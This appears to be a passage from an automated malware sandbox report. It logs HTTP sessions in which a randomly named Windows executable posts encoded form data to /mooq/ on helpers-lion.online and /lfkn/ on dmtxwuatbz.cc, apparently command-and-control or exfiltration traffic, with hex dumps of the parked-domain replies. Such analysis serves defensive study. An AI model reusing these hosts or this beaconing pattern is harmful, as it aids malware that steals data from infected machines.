d3 3a 56 3f ba [TRUNCATED]
                                          Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                                          Jul 4, 2024 16:55:27.350768089 CEST1236INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                                          Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                                          Jul 4, 2024 16:55:27.350781918 CEST1236INData Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                                          Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                                          Jul 4, 2024 16:55:27.350795031 CEST114INData Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                                          Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          34192.168.2.749741194.58.112.174806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:29.149800062 CEST825OUTPOST /mooq/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.helpers-lion.online
                                          Origin: http://www.helpers-lion.online
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 237
                                          Referer: http://www.helpers-lion.online/mooq/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 72 4c 66 33 4b 68 49 6e 76 4e 37 41 56 6d 68 79 62 34 44 36 33 59 72 48 41 5a 51 6a 51 45 44 76 66 36 48 51 34 34 31 6c 6b 6b 6d 64 63 68 58 47 45 6f 33 58 56 71 68 43 75 77 46 6d 2f 7a 68 45 4a 45 54 50 41 4a 47 47 61 34 51 63 58 6f 67 4e 7a 44 68 67 6d 68 4f 45 64 75 49 37 36 2b 7a 54 64 61 74 4d 52 4f 37 37 4b 44 78 68 30 4e 6d 67 36 50 4e 41 4c 45 45 46 32 32 42 59 43 57 59 62 4c 75 73 74 4a 34 59 6b 67 36 4a 61 74 6b 75 54 65 46 50 67 70 34 32 70 57 65 69 74 73 38 71 4f 37 2f 56 6f 79 62 42 67 4e 30 6f 34 72 71 49 72 7a 74 78 52 4e 63 4a 70 31 49 73 47 6b 3d
                                          Data Ascii: YbCL=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHrLf3KhInvN7AVmhyb4D63YrHAZQjQEDvf6HQ441lkkmdchXGEo3XVqhCuwFm/zhEJETPAJGGa4QcXogNzDhgmhOEduI76+zTdatMRO77KDxh0Nmg6PNALEEF22BYCWYbLustJ4Ykg6JatkuTeFPgp42pWeits8qO7/VoybBgN0o4rqIrztxRNcJp1IsGk=
                                          Jul 4, 2024 16:55:29.859321117 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:29 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Content-Encoding: gzip
                                          Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                                          Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                                          Jul 4, 2024 16:55:29.859339952 CEST1236INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                                          Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1AO!V?lX
                                          Jul 4, 2024 16:55:29.859352112 CEST1236INData Raw: bb 78 2a ab 44 16 fc 4f a2 4f 66 3d 90 97 0e cb 22 4f 4f 53 8c 71 32 be 18 91 d9 06 9d d3 5a d0 1f 45 79 ca 0b 8a 89 2d 12 69 ce 12 38 53 2e 9c 5b a0 39 d2 64 b0 fa 23 30 e9 a7 1c fd b1 e1 65 b4 43 9e a3 22 fe 86 bb 01 d5 3a f5 00 89 d7 b0 89 ce
                                          Data Ascii: x*DOOf="OOSq2ZEy-i8S.[9d#0eC":wO\3mb.@8>2D=8@39i#(O l:#48SNtVOdgOLWp62^="?*7YF>P8V
                                          Jul 4, 2024 16:55:29.859416962 CEST114INData Raw: 89 de cb bd 0a 0b d9 aa 50 8b 23 87 4d 27 f4 03 2e e2 71 af 17 8d ec f9 59 14 e3 6c da 19 74 f5 db b6 b9 2b d9 a2 10 66 65 f2 e2 15 1c 1d 72 e3 59 a0 0f c7 c2 43 9f b3 b2 1d fa ee 28 52 2b 82 ae 4a ce 1a 67 f0 33 bc b2 52 12 d2 c5 43 29 72 04 9d
                                          Data Ascii: P#M'.qYlt+ferYC(R+Jg3RC)rO&%Yp~ykFi)0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          35192.168.2.749742194.58.112.174806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:31.681422949 CEST1838OUTPOST /mooq/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.helpers-lion.online
                                          Origin: http://www.helpers-lion.online
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 1249
                                          Referer: http://www.helpers-lion.online/mooq/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Data Raw: 59 62 43 4c 3d 33 41 52 4a 70 41 4f 43 46 54 64 57 33 79 4a 38 31 72 44 4b 46 49 51 59 79 45 2f 52 53 42 6a 38 57 79 75 69 30 70 2f 46 46 48 7a 4c 66 45 79 68 48 6b 48 4e 36 41 56 6d 6f 53 62 35 44 36 32 43 72 48 6f 64 51 6a 4d 2b 44 74 58 36 47 79 77 34 6b 30 6b 6b 73 64 63 68 62 6d 45 6c 35 33 56 2f 68 43 2b 30 46 6d 50 7a 68 45 4a 45 54 4e 59 4a 53 48 61 34 57 63 58 33 6e 4e 7a 78 6c 67 6d 46 4f 45 46 59 49 37 32 45 7a 6a 39 61 75 73 42 4f 2b 4a 79 44 75 52 30 50 32 77 36 74 4e 41 50 62 45 46 36 4c 42 64 2f 42 59 59 62 75 75 39 4d 5a 49 6d 38 46 65 61 31 45 32 7a 4f 37 59 47 68 69 76 4c 48 6b 6c 4f 51 4f 67 4f 75 62 62 4a 44 58 56 56 73 76 35 4c 54 38 52 70 48 61 38 52 30 6b 54 5a 35 66 36 67 57 76 45 58 74 5a 53 34 51 63 44 71 64 4c 77 57 68 6c 78 45 62 76 2f 70 42 36 67 4f 4a 2b 6e 75 4c 52 6e 56 37 4d 4f 30 59 57 7a 76 38 44 6f 78 38 55 6c 6f 51 6e 33 31 57 70 6f 67 45 37 56 35 53 31 58 77 38 56 45 6a 76 4e 6a 34 66 30 6d 72 48 73 56 62 7a 4c 6c 52 37 79 32 73 66 59 6f 32 33 35 4e 45 49 54 76 [TRUNCATED]
                                          Data Ascii: YbCL=3ARJpAOCFTdW3yJ81rDKFIQYyE/RSBj8Wyui0p/FFHzLfEyhHkHN6AVmoSb5D62CrHodQjM+DtX6Gyw4k0kksdchbmEl53V/hC+0FmPzhEJETNYJSHa4WcX3nNzxlgmFOEFYI72Ezj9ausBO+JyDuR0P2w6tNAPbEF6LBd/BYYbuu9MZIm8Fea1E2zO7YGhivLHklOQOgOubbJDXVVsv5LT8RpHa8R0kTZ5f6gWvEXtZS4QcDqdLwWhlxEbv/pB6gOJ+nuLRnV7MO0YWzv8Dox8UloQn31WpogE7V5S1Xw8VEjvNj4f0mrHsVbzLlR7y2sfYo235NEITvVQhmOmbpCT1nHQt96q5JUCK1uWjyulrDMBYqy34k65tRtH2I0sCMDIk7Z0dh7R1+hjQaxOPM8btvKUxiiDvIeeCdQ2gOnWZDMgOB1qLlBw5H260SPWl5zoUmAkgwvT0qnZJf/wFUbMsGvVIY6cJm85nOiN9Qh/QvOX34kRFtObjOrypDnOXfF8QiBBky1Txwal5pckY04+VwLi86tS5wvcZyGIoRyrf+HZAWWMl2U/QaXHMTNCvr6mV6pl+cY17nrY5o0TSIf0/CFCwln3BrBXk+4ffdlzj7pgDkT28hLnXO8gPueY2tRM9jKQDH8SmmugL9e7sC2HkY3svYRjYqFrudO7UczLQCKRP1r0DJPGugKi138cUMKOwAFiQGS6kCe9tiNuod9swNIbCSV9mlzyY7bct4m1J/e9Z5uz8OWaqGe96ZmLiGfGs9NQoVQp34XASAFIRZrMSb3XAeCGhPCYnZqY2uXFIcLpWUCDFXMFfuXkdn8McO0o3hm0GbDxmsp7EV1QyUyTnk9eRIrN0HTqa0NSadN5ObBp0NNsG33GoLi4+kc25D3fBur80OHoXo0ZKsBKzMM7Mok8EqO+L1DY/1mbj7KVMLlUTOL9IMGPOIi6PXPXOuKCQ3EIQl7cG5a5wBQllqVmG234K2/92D16A9HweBmgx2gJ [TRUNCATED]
                                          Jul 4, 2024 16:55:32.382322073 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Content-Encoding: gzip
                                          Data Raw: 65 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb ec 29 77 a8 82 d0 70 1d df 33 7d cf 75 3c 55 b7 74 75 1d 5f fa 22 50 6e a3 14 46 63 57 85 3d a5 30 d3 40 75 1c d9 28 49 d7 2d 89 5e a0 36 72 79 59 3e 43 8e 22 df b4 c3 10 b3 4c fa 3b 58 49 d6 7a 43 42 34 4c 86 3f ab cb 25 41 2a 84 c6 06 b2 ab ac 2b 06 37 6c d6 43 3b 70 86 51 d3 3a 56 3f ba [TRUNCATED]
                                          Data Ascii: e34Zmo_qdCKrtu-HI6+4hW`Can^@=\dq}=<oGh6WF[#J^QF%QT$AFK0NK=9PP}{(P`ds~n9MV995B[!"'rUskk)wp3}u<Utu_"PnFcW=0@u(I-^6ryY>C"L;XIzCB4L?%A*+7lC;pQ:V?~KYGoQ 7hgGRz}u1n,T@z#\-?8dXF0@0LfQ~f5i$<l$!;mc[Ek2SmN4pV+!J);G$R`x/~Em|'y|^%WpHmxax&<X;oo(Y]V0fu43V+uvc+CdbfX<buJF:?iyL[nw2UoxW[,~By3VEt%`Zlh"tS-@` ]G=\b(;XxfG4hm|'V,$tk(U#Dx%^i>s-ku2-P2!uZ<x/$)A-d8)k!d0kggU]UGXo1zwEm_G [TRUNCATED]
                                          Jul 4, 2024 16:55:32.382335901 CEST224INData Raw: c0 83 46 df d3 f6 e9 ac 13 f3 17 98 d6 35 06 f0 6a c7 6b b9 6a 23 32 b4 87 63 c2 28 f0 bd ee d3 8d 02 5a 06 dc 6d 8a 6a ff 02 7a 11 c2 a0 de c7 f1 3d e0 8c 47 98 62 db 59 ff d5 ca 09 47 6d 6d f2 5c 92 b6 0f de 1b 20 68 7a 0a e3 fe 19 a1 f0 7e f2
                                          Data Ascii: F5jkj#2c(Zmjz=GbYGmm\ hz~%\qy)nT\@)9tJF@o|ZYj!;]har`$C/0N1(~$?<,CfRN>C+@?: 1
                                          Jul 4, 2024 16:55:32.382419109 CEST1236INData Raw: 41 0b fd 4f f2 21 56 b4 13 3f 80 6c bb 58 08 16 91 dc 16 94 e9 a4 05 c8 7d d8 31 d3 0a 8a a1 b4 e0 1d fc 7f 40 6b cc 82 2b 34 90 7c c2 5a 60 5f 86 96 e2 ef a0 16 b4 fd e1 d7 fb 6f cc 4d d6 60 30 1e b4 da 3f 25 9f a7 66 bd c7 d6 4c 97 c9 24 b4 13
                                          Data Ascii: AO!V?lX}1@k+4|Z`_oM`0?%fL$?Br8!D(<a~agp#$!%@uyL:|dt4SW \-YNG."5ly4(6iF2<$
                                          Jul 4, 2024 16:55:32.382431030 CEST1126INData Raw: f9 be 12 f7 14 b8 59 a8 8a e9 46 d4 3e 50 38 9a f3 56 a6 3a 5f 3f 32 f5 75 32 16 ee 39 5a 4e 67 ee 38 9b 32 10 74 33 10 e2 ea 15 77 e0 a3 01 2e a2 cc df 8d 54 30 5e 53 2e d8 df 0f ce b9 6e 45 94 65 59 54 a7 67 23 29 36 fc 00 f2 d2 18 0e fa 9f 58
                                          Data Ascii: YF>P8V:_?2u29ZNg82t3w.T0^S.nEeYTg#)6Xtz(9~|I&]ysR^-WELo1[r\%rC5GTI?c}uSr46\`GL,vk"cWA`^F7i%}*ejW<P


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          36192.168.2.749743194.58.112.174806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:34.215828896 CEST533OUTGET /mooq/?fhW=BLvXr6e0EhyxeX&YbCL=6C5pq03gIUcCxycao4jVOd5j2ETtSk+CIQvh/K6jTje/eWOGI1u26kAEsQXtCs3elXAZegkYPdXqLAdc1WNGmvwMEDU2l3Vk/j3vF3XZl1x4VY01FUKFB6WA/ZrLtnyfA2FlJPqZ/llT HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Host: www.helpers-lion.online
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                                          Jul 4, 2024 16:55:34.945995092 CEST1236INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Thu, 04 Jul 2024 14:55:34 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 68 65 6c 70 65 72 73 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 [TRUNCATED]
                                          Data Ascii: 298a<!doctype html><html class="is_adaptive" lang="ru"><head><meta charset="UTF-8"><meta name="parking" content="regru-rdap"><meta name="viewport" content="width=device-width,initial-scale=1"><title>www.helpers-lion.online</title><link rel="stylesheet" media="all" href="parking-rdap-auto.css"><link rel="icon" href="favicon.ico?1" type="image/x-icon"><script>/*<![CDATA[*/window.trackScriptLoad = function(){};/*...*/</script><script onload="window.trackScriptLoad('/manifest.js')" onerror="window.trackScriptLoad('/manifest.js', 1)" src="/manifest.js" charset="utf-8"></script><script onload="window.trackScriptLoad('/head-scripts.js')" onerror="window.trackScriptLoad('/head-scripts.js', 1)" src="/head-scripts.js" charset="utf-8"></script></head><body class="b-page b-page_type_parking b-parking b-parking_bg_light"><header class="b-parking__header b-parking__header_type_rdap"><div class="b-parking__header-note b-text"> &nbsp;<a class="b-link" href="https://r [TRUNCATED]
                                          Jul 4, 2024 16:55:34.946018934 CEST1236INData Raw: 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 20 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 20 62 2d 70 61
                                          Data Ascii: /div><div class="b-page__content-wrapper b-page__content-wrapper_style_indent b-page__content-wrapper_type_hosting-static"><div class="b-parking__header-content"><h1 class="b-parking__header-title">www.helpers-lion.online</h1><p class="b-parki
                                          Jul 4, 2024 16:55:34.946033001 CEST1236INData Raw: 69 74 6c 65 22 3e d0 94 d1 80 d1 83 d0 b3 d0 b8 d0 b5 20 d1 83 d1 81 d0 bb d1 83 d0 b3 d0 b8 20 d0 a0 d0 b5 d0 b3 2e d1 80 d1 83 3c 2f 68 32 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 70 72 6f 6d 6f 22 3e 3c 64 69 76
                                          Data Ascii: itle"> .</h2><div class="b-parking__promo"><div class="b-parking__promo-item b-parking__promo-item_type_hosting-overall"><div class="b-parking__promo-header"><span class="b-parking__promo-image b-parking__pro
                                          Jul 4, 2024 16:55:34.946044922 CEST1236INData Raw: d1 80 d0 b8 d0 be d0 b4 2e 3c 2f 70 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 62 75 74 74 6f 6e 2d 77 72 61 70 70 65 72 22 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62
                                          Data Ascii: .</p></li></ul><div class="b-parking__button-wrapper"><a class="b-button b-button_color_primary b-button_style_wide b-button_size_medium-compact b-button_text-size_normal b-parking__button b-parking__button_type_hosting" href="https://
                                          Jul 4, 2024 16:55:34.946084976 CEST1236INData Raw: 2d 6c 69 6f 6e 2e 6f 6e 6c 69 6e 65 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 70 61 72 6b 69 6e 67 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 73 5f 6c 61 6e 64 5f 73 65 72 76 65 72 26 61 6d 70 3b 72 65 67 5f 73 6f 75 72 63 65 3d 70 61 72 6b 69 6e 67 5f
                                          Data Ascii: -lion.online&utm_medium=parking&utm_campaign=s_land_server&amp;reg_source=parking_auto"></a></div><div class="b-parking__promo-item b-parking__promo-item_type_cms"><strong class="b-title b-title_size_large-compact">
                                          Jul 4, 2024 16:55:34.946098089 CEST1120INData Raw: 26 6e 62 73 70 3b d0 bd d0 b5 d1 81 d0 ba d0 be d0 bb d1 8c d0 ba d0 be 20 d0 bc d0 b8 d0 bd d1 83 d1 82 2e 3c 2f 70 3e 3c 61 20 63 6c 61 73 73 3d 22 62 2d 62 75 74 74 6f 6e 20 62 2d 62 75 74 74 6f 6e 5f 63 6f 6c 6f 72 5f 72 65 66 65 72 65 6e 63
                                          Data Ascii: &nbsp; .</p><a class="b-button b-button_color_reference b-button_style_block b-button_size_medium-compact b-button_text-size_normal" href="https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.on
                                          Jul 4, 2024 16:55:34.946110010 CEST1236INData Raw: 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 72 6d 61 6c 20 6c 2d 6d 61 72 67 69 6e 5f 74 6f 70 2d 6d 65 64 69 75 6d 40 64 65 73 6b 74 6f 70 20 6c 2d 6d 61 72 67 69 6e 5f 62 6f 74 74 6f 6d 2d 6e 6f 6e 65 40 64 65 73 6b 74 6f 70 22 3e d0 a3 d1 81 d1 82 d0 b0
                                          Data Ascii: n_bottom-normal l-margin_top-medium@desktop l-margin_bottom-none@desktop"> SSL- &nbsp; &nbsp;!
                                          Jul 4, 2024 16:55:34.946122885 CEST1236INData Raw: 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 20 20 20
                                          Data Ascii: } } var script = document.createElement('script'); var head = document.getElementsByTagName('head')[0]; script.src = 'https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&r
                                          Jul 4, 2024 16:55:34.946146011 CEST1025INData Raw: 20 27 6e 6f 6e 65 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f
                                          Data Ascii: 'none'; } } }</script>... Global site tag (gtag.js) - Google Analytics --><script async src="https://www.googletagmanager.com/gtag/js?id=UA-3380909-25"></script><script>window.dataLayer = window.dataLayer || []; f


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          37192.168.2.749744172.67.210.102806404C:\Program Files (x86)\tYPbEECIUNGebXluUbJulqzfdqlpyRqdLqNnjxNW\ftlDDsmJxbqfWuvUNSEx.exe
                                          TimestampBytes transferredDirectionData
                                          Jul 4, 2024 16:55:40.027987003 CEST787OUTPOST /lfkn/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Accept-Language: en-us
                                          Accept-Encoding: gzip, deflate, br
                                          Host: www.dmtxwuatbz.cc
                                          Origin: http://www.dmtxwuatbz.cc
                                          Cache-Control: max-age=0
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Content-Length: 217
                                          Referer: http://www.dmtxwuatbz.cc/lfkn/
                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
